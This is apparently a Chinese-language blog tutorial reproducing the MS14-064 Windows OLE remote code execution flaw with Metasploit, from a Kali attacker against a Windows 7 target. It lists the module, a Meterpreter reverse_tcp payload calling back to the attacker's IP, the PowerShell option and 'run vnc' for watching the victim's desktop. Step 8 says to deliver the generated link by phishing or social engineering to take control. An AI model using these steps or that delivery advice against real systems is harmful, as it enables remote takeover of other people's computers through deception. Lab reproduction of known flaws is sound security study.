漏洞复现:MS14-064 OLE远程代码执行漏洞


MS14-064OLE远程代码执行漏洞

 

 

 

 

攻击机:Kali Linux 2019

靶机:Windows 7 x64、x32

攻击步骤:

1.打开攻击机Kali Linux 2019系统和靶机Windows 7系统

 

 

 2.确定IP地址后,Kali Linux开启msf模块,准备攻击测试

漏洞复现:MS14-064 OLE远程代码执行漏洞_第1张图片

 

 

3.在这里我们使用MS14-064OLE远程代码执行漏洞,开始搜索MS14-064

 

(search MS14-064)

 

漏洞复现:MS14-064 OLE远程代码执行漏洞_第2张图片

 

 

 4.我们利用use exploit/windows/browser/ms14_064_ole_code_execution  加载漏洞利用模块

use exploit/windows/browser/ms14_064_ole_code_execution

 

 

漏洞复现:MS14-064 OLE远程代码执行漏洞_第3张图片

 

 

 

5.查看详细配置,进行下一步的详细配置

漏洞复现:MS14-064 OLE远程代码执行漏洞_第4张图片

 

 

 6.开始配置payload,Payload下的LHOST地址和模块下的SRVHOST地址

(Payload:set payload windows/meterpreter/reverse_tcp)

(LHOST地址:Kali Linux IP地址)

(SRVHOST地址:Kali Linux IP地址)

漏洞复现:MS14-064 OLE远程代码执行漏洞_第5张图片

 

 

 7.注意一下上图这个箭头位置,要把其中的默认false熟悉改为true,因为msf中自带的漏洞是利用exp调用的是powershell,所以msf的exp代码只对安装了powershell的系统生效,这里我们来用windows 7 系统进行测试。

(命令:set ALlowPowershellPrompt true)

漏洞复现:MS14-064 OLE远程代码执行漏洞_第6张图片

 

 

 8.输入exploit 进行测试,会生成一个url链接,用钓鱼方法或者是社会工程学传到Win7主机里,就可以实现控制

漏洞复现:MS14-064 OLE远程代码执行漏洞_第7张图片

 

 

 漏洞复现:MS14-064 OLE远程代码执行漏洞_第8张图片

 

 漏洞复现:MS14-064 OLE远程代码执行漏洞_第9张图片

 

 

 

 9.提取到权限,渗透完成,可以进行远程桌面操控,观察操作桌面等

(run vnc 观察操作界面)

漏洞复现:MS14-064 OLE远程代码执行漏洞_第10张图片

 

你可能感兴趣的:(漏洞复现:MS14-064 OLE远程代码执行漏洞)